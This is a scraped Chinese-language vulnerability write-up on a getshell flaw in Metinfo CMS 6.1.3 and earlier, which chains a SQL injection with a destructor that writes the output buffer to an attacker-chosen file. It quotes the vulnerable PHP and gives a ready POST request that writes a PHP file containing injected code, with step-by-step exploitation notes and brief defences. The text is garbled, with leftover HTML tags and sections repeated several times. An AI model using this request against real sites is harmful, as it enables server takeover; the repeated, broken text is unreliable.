Metinfo <= 6.1.3 前台Getshell漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Metinfo内容管理系统在6.1.3及以下版本存在一个严重的安全漏洞，攻击者可以通过结合前台SQL注入漏洞实现任意文件写入，最终获取服务器控制权限。<\/p>

漏洞影响版本<\/h2>

Metinfo 6.x <= 6.1.2<\/li>

Metinfo 6.1.3<\/li> <\/ul>

漏洞原理分析<\/h2>

核心漏洞点<\/h3>
漏洞存在于`app\/system\/include\/class\/web.class.php<\/code>文件中，当满足条件$_M['form']['metinfonow'] == $_M['config']['met_member_force']<\/code>时，web类的析构函数会将缓冲区的数据写入一个可控的文件中。<\/p>`

关键代码分析<\/h3>


文件写入条件<\/strong>：<\/p>
if<\/span>($_M['form'<\/span>]['metinfonow'<\/span>] ==<\/span> $_M['config'<\/span>]['met_member_force'<\/span>]) {
<\/span><\/span>    file_put_contents<\/span>($_M['form'<\/span>]['html_filename'<\/span>], ob_get_contents<\/span>());
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

met_member_force生成机制<\/strong>：<\/p>
$_M['config'<\/span>]['met_member_force'<\/span>] =<\/span> randStr<\/span>(7<\/span>); \/\/ 随机生成7个字符
<\/span><\/span><\/span><\/code><\/pre><\/li>

可利用的子类<\/strong>：

uploadify<\/code>类继承了web<\/code>类，并提供了可控的缓冲区数据输出。<\/p>
<\/li>
<\/ol>
攻击流程<\/h3>

通过SQL注入获取met_member_force<\/code>的值<\/li>
利用uploadify<\/code>类的doupfile<\/code>方法将恶意代码写入缓冲区<\/li>
触发析构函数将缓冲区内容写入可控文件<\/li>
<\/ol>
漏洞利用步骤<\/h2>
第一步：获取met_member_force值<\/h3>
对于不同版本：<\/p>

6.1.2及以下<\/strong>：利用留言板处的SQL注入<\/li>
6.1.3<\/strong>：利用反馈处的SQL注入<\/li>
<\/ul>
注入示例：<\/p>
通过注入获取$<\/span>_M['config'<\/span>]['met_member_force'<\/span>]的值<\/span>
<\/span><\/span><\/code><\/pre>第二步：构造恶意请求<\/h3>
POST请求示例：<\/p>
POST \/metinfo\/admin\/index.php?c=uploadify&m=include&a=doupfile&lang=cn&metinfonow=qipwtxm&html_filename=1.php HTTP\/1.1
Host: localhost
Content-Type: multipart\/form-data; boundary=----WebKitFormBoundary8tQiXReYsQYXHadW

------WebKitFormBoundary8tQiXReYsQYXHadW
Content-Disposition: form-data; name="test"; filename="<?php phpinfo();?>"
Content-Type: image\/jpeg

test
------WebKitFormBoundary8tQiXReYsQYXHadW--
<\/code><\/pre>
关键参数说明：<\/p>

metinfonow<\/code>: 必须等于通过注入获取的met_member_force<\/code>值<\/li>
html_filename<\/code>: 指定要写入的恶意文件路径<\/li>
文件名部分包含PHP代码<?php phpinfo();?><\/code><\/li>
<\/ul>
第三步：触发文件写入<\/h3>
通过上传操作触发uploadify<\/code>类的doupfile<\/code>方法，该方法会将恶意代码输出到缓冲区，最终通过析构函数写入指定文件。<\/p>
攻击流程图解<\/h2>

通过SQL注入获取met_member_force<\/code>值<\/li>
构造恶意上传请求<\/li>
uploadify<\/code>类处理上传并将恶意代码输出到缓冲区<\/li>
析构函数检测到metinfonow<\/code>匹配后将缓冲区写入文件<\/li>
生成Webshell<\/li>
<\/ol>
防御措施<\/h2>

升级到最新版本<\/li>
对用户输入进行严格过滤<\/li>
限制文件写入权限<\/li>
修复SQL注入漏洞<\/li>
<\/ol>
参考链接<\/h2>

[Metinfo6.0.0-6.1.2前台注入漏洞生命线]<\/li>
【技术分析】Metinfo利用sql注入快速getshell<\/li>
<\/ul>
注意事项<\/h2>

此漏洞需要结合SQL注入使用<\/li>
不同版本需要不同的注入点<\/li>
文件名和路径需要根据实际情况调整<\/li>
攻击前应获取准确的met_member_force<\/code>值<\/li>
<\/ol>

Metinfo <= 6.1.3 前台Getshell漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Metinfo内容管理系统在6.1.3及以下版本存在一个严重的安全漏洞，攻击者可以通过结合前台SQL注入漏洞实现任意文件写入，最终获取服务器控制权限。<\/p>

漏洞原理分析<\/h2>

核心漏洞点<\/h3>
漏洞存在于`app\/system\/include\/class\/web.class.php<\/code>文件中，当满足条件$_M['form']['metinfonow'] == $_M['config']['met_member_force']<\/code>时，web类的析构函数会将缓冲区的数据写入一个可控的文件中。<\/p>`

漏洞利用步骤<\/h2>

第三步：触发文件写入<\/h3>
通过上传操作触发`uploadify<\/code>类的doupfile<\/code>方法，该方法会将恶意代码输出到缓冲区，最终通过析构函数写入指定文件。<\/p>`

注意事项<\/h2>

此漏洞需要结合SQL注入使用<\/li>
不同版本需要不同的注入点<\/li>
文件名和路径需要根据实际情况调整<\/li>
攻击前应获取准确的`met_member_force<\/code>值<\/li> <\/ol>`

Metinfo <= 6.1.3 前台Getshell漏洞分析与利用<\/h1>

漏洞概述<\/h2> Metinfo内容管理系统在6.1.3及以下版本存在一个严重的安全漏洞，攻击者可以通过结合前台SQL注入漏洞实现任意文件写入，最终获取服务器控制权限。<\/p>

漏洞原理分析<\/h2>

核心漏洞点<\/h3> 漏洞存在于app\/system\/include\/class\/web.class.php<\/code>文件中，当满足条件$_M['form']['metinfonow'] == $_M['config']['met_member_force']<\/code>时，web类的析构函数会将缓冲区的数据写入一个可控的文件中。<\/p>

漏洞利用步骤<\/h2>

第三步：触发文件写入<\/h3> 通过上传操作触发uploadify<\/code>类的doupfile<\/code>方法，该方法会将恶意代码输出到缓冲区，最终通过析构函数写入指定文件。<\/p>

注意事项<\/h2> 此漏洞需要结合SQL注入使用<\/li> 不同版本需要不同的注入点<\/li> 文件名和路径需要根据实际情况调整<\/li> 攻击前应获取准确的met_member_force<\/code>值<\/li> <\/ol>

漏洞概述<\/h2>
Metinfo内容管理系统在6.1.3及以下版本存在一个严重的安全漏洞，攻击者可以通过结合前台SQL注入漏洞实现任意文件写入，最终获取服务器控制权限。<\/p>

核心漏洞点<\/h3>
漏洞存在于`app\/system\/include\/class\/web.class.php<\/code>文件中，当满足条件$_M['form']['metinfonow'] == $_M['config']['met_member_force']<\/code>时，web类的析构函数会将缓冲区的数据写入一个可控的文件中。<\/p>`

第三步：触发文件写入<\/h3>
通过上传操作触发`uploadify<\/code>类的doupfile<\/code>方法，该方法会将恶意代码输出到缓冲区，最终通过析构函数写入指定文件。<\/p>`

注意事项<\/h2>

此漏洞需要结合SQL注入使用<\/li>
不同版本需要不同的注入点<\/li>
文件名和路径需要根据实际情况调整<\/li>
攻击前应获取准确的`met_member_force<\/code>值<\/li> <\/ol>`